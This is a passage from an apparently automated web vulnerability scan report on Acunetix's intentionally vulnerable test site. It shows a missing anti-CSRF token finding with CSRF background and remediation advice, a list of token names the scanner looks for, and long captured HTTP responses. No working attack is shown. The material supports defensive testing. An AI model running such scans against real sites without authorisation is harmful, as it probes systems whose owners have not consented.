style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" 